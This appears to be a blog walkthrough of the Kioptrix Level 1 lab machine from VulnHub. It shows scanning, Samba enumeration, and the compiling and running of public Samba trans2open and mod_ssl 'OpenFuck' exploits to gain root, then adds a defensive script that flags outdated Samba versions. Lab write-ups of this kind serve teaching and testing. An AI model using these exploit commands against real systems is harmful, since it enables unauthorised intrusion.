
Kioptrix: Level 1 - Walkthrough

May 15, 2017 by Chiragh Dewan

Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root's email.

For the attacking machine, I will be using Kali 2017.1.


Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let's start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 - Running OpenSSH
  • Port 80 - Running Apache Web server
  • Port 111 - Running RPC
  • Port 139 - Running Samba
  • Port 443 - Running Apache web server over SSL
  • Port 1024 - Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code either. Going back to the services that are running, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information, including the Samba version being used, 2.2.1a. Upon doing a simple exploit search, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

Then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I give the final file proper permissions:

$ chmod 755 samba

Let's dry run the exploit and see which parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:

While playing around with it more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was by exploiting mod_ssl (CVE-2002-0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following this tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will need libssl and libssl-dev installed before you compile the exploit.

Let's exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40
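
From the defender's side, the Samba version string that the enumeration step returned (2.2.1a) is exactly what a patch inventory would key on. The following is an added example, not part of the original walkthrough: it parses Samba banners and flags every release older than 2.2.8a, which is assumed here (from the public advisory, not from this page) to be the first release fixed against the trans2open overflow. Host names and banner lines are constructed.

```python
import re

# Assumption: 2.2.8a is the first Samba release fixed against the trans2open
# overflow (taken from the public advisory, not stated in the walkthrough).
FIXED = (2, 2, 8, "a")

_VERSION_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)([a-z]?)", re.IGNORECASE)


def parse_samba_version(text):
    """Return (major, minor, patch, letter) from a banner line, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4).lower())


def needs_patch(version):
    """True for any release that sorts before the fixed 2.2.8a."""
    # Tuple comparison: numbers first, then the letter suffix ("" < "a").
    return version < FIXED


def audit(inventory):
    """Map host -> 'upgrade' | 'ok' | 'unknown' for (host, banner) pairs."""
    report = {}
    for host, banner in inventory:
        version = parse_samba_version(banner)
        if version is None:
            report[host] = "unknown"  # banner hidden or not Samba: check by hand
        elif needs_patch(version):
            report[host] = "upgrade"
        else:
            report[host] = "ok"
    return report


# Constructed inventory. Only the 2.2.1a version comes from the walkthrough.
SAMPLE = [
    ("lab-vm", "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]"),
    ("files01", "Server=[Samba 2.2.8]"),
    ("files02", "Server=[Samba 2.2.8a]"),
    ("files03", "Server=[Samba 4.15.13]"),
    ("print01", "Server=[Windows 5.1]"),
]

if __name__ == "__main__":
    for host, status in audit(SAMPLE).items():
        print(f"{host}: {status}")
```

A host reported as "unknown" is not cleared: a suppressed or rewritten banner only means the version has to be confirmed from the package database on the host itself.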


Chiragh Dewan

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc. for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security, including at a TEDx event.